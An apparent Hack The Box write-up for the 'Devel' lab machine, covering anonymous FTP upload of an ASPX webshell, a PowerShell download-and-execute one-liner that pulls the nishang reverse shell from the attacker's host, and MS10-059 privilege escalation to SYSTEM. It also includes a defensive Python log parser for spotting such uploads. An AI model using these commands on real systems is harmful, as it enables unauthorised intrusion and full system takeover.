🕵 HTB-Writeup : DEVEL

Recon

nmap

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

A Windows machine running the Microsoft IIS web server, version 7.5.

Dirbuster

The Dirbuster scan doesn't find any directories or files.

Tested extensions:

  • php
  • txt
  • xml
  • sh
  • asp
  • html

ftp server

As the nmap ftp-anon script shows, we can connect to the FTP server as the anonymous user.

└─$ ftp anonymous@10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> 

But we can’t find any interesting files.

Since we can't find any directories or files, I try to find vulnerabilities on the FTP server.

First, I download every file available over the anonymous connection. No interesting files.

└─$ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.5

└─$ tree 10.10.10.5 
10.10.10.5
├── aspnet_client
│   └── system_web
│       └── 2_0_50727
├── iisstart.htm
└── welcome.png

I try to brute-force accounts with the nmap NSE scripts. No results.

└─$ nmap --script ftp-* -p 21 10.10.10.5

| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 50009 guesses in 317 seconds, average tps: 145.0

Re-checking the downloaded files, I realize that I have missed an important piece of information: the IIS web server serves the same directory as this FTP server. When we navigate to http://10.10.10.5/aspnet_client/ we get an access denied, so the FTP root is the IIS web root.

Vulnerabilities

Knowing that, we can try to upload a file to get a reverse shell.

I upload an ASPX webshell over FTP to try to execute PowerShell commands. The webshell can be found at /usr/share/webshells/aspx/cmdasp.aspx on Kali Linux.

Then, I prepare the nishang reverse PowerShell script, which can be found at this link.

I add the following line to the bottom of the script, with our IP and port:

Invoke-PowerShellTcp -Reverse -IPAddress <MyIP> -Port <MyPORT>

Then, I start a Python HTTP server that serves our PowerShell script. From the webshell, we download and execute the script:

# on aspx command prompt
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<MyIP>:<MyPORT>/Invoke-PowerShellTcp.ps1')"

(Screenshot: Command injection on the form)

(Screenshot: Response on our host)

It works! We get a reverse shell!

Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

    Directory: C:\windows\system32\inetsrv

PS C:\windows\system32\inetsrv> whoami
iis apppool\web

We can get the user flag. Let’s go to the privesc!
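The foothold above rests on one misconfiguration: the anonymous FTP account can write into the IIS web root, so an uploaded .aspx is executed on the next HTTP request. As an added defender-side example (not part of the original writeup), this script flags such uploads in IIS FTP W3C site logs. The log lines are constructed, and the extension list is an assumption about a default IIS 7.5 handler mapping.

```python
"""Flag FTP uploads of server-executable files in IIS FTP W3C logs."""
import os

# Extensions IIS hands to a script engine or managed handler (assumption: a
# default IIS 7.5 handler mapping; extend to your server's own mappings).
EXECUTABLE_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}

# Constructed sample, not a real capture. Columns follow the "#Fields:" header,
# so the parser adapts to whatever column order a real site log uses.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2017-03-17 17:37:01 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230
2017-03-17 17:37:05 10.10.14.2 anonymous 10.10.10.5 21 STOR /welcome.png 226
2017-03-17 17:38:10 10.10.14.2 anonymous 10.10.10.5 21 STOR /cmdasp.aspx 226
2017-03-17 17:38:12 10.10.14.2 anonymous 10.10.10.5 21 STOR /notes.txt 226
2017-03-17 17:39:00 10.10.14.2 webdev 10.10.10.5 21 STOR /site/Index.ASPX 226
"""

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields is not None:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_executable_uploads(text, anonymous_only=True):
    """Return (time, client, user, path, status) for every STOR of a file IIS
    would execute; anonymous_only keeps just unauthenticated writes (DEVEL)."""
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-method") != "STOR":
            continue
        ext = os.path.splitext(rec["cs-uri-stem"])[1].lower()
        if ext not in EXECUTABLE_EXTS:
            continue
        if anonymous_only and rec["cs-username"].lower() != "anonymous":
            continue
        hits.append((f"{rec['date']} {rec['time']}", rec["c-ip"],
                     rec["cs-username"], rec["cs-uri-stem"], rec["sc-status"]))
    return hits

if __name__ == "__main__":
    for when, client, user, path, status in find_executable_uploads(SAMPLE_LOG, False):
        print(f"{when} {client} {user} uploaded {path} (sc-status {status})")
```

The same parser works on an IIS HTTP log, so a second pass can correlate each flagged STOR with the first GET of that path, which is the moment the webshell was used.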

privesc

I first get the output of systeminfo and pass it to the Windows-Exploit-Suggester tool.

└─$ python2 ../TOOLS/Windows-Exploit-Suggester/windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo -l

[*] initiating winsploit version 3.3...
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] searching for local exploits only
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done

It gives me 3 potential vulnerabilities. I found this GitHub repository that lists multiple Windows exploits; I try the third one listed by our tool (MS10-059).

The MS10-059 vulnerability allows an attacker to run code with elevated privileges. It exploits incorrect access control lists (ACLs) on the registry keys for the Tracing Feature for Services.

I download the program onto the machine from an SMB share, then execute it.

(Screenshot: Commands executed on the target)

We get another reverse shell! This time with SYSTEM privileges!

(Screenshot: Reverse shell gained on the host)

Tags

Easy, External, Network, IIS, ASP, Penetration Tester Level 2, Remote Code Execution, Unrestricted File Upload